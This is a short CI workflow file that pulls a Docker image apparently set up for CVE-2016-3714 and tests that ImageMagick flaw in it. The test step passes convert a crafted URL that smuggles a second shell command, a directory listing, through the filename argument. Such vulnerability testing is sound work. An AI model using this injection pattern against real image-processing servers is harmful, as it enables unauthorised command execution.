name: Manual CVE Tests

on:
  push:
    branches: [ "main" ]
  pull_request:
    branches: [ "main" ]

jobs:

  build:

    runs-on: ubuntu-latest

    steps:

    - name: Pull docker (CVE-2016-3714)
      run: |
        docker pull ghcr.io/pi3dra/ci-decret/cve-2016-3714:latest
        docker tag ghcr.io/pi3dra/ci-decret/cve-2016-3714:latest cve-2016-3714

    - name: Test vuln (CVE-2016-3714)
      run: |
        docker run cve-2016-3714 apt-get install curl wget -y --force-yes
        docker run cve-2016-3714 convert 'https://example.com";ls "-la' out.png
        
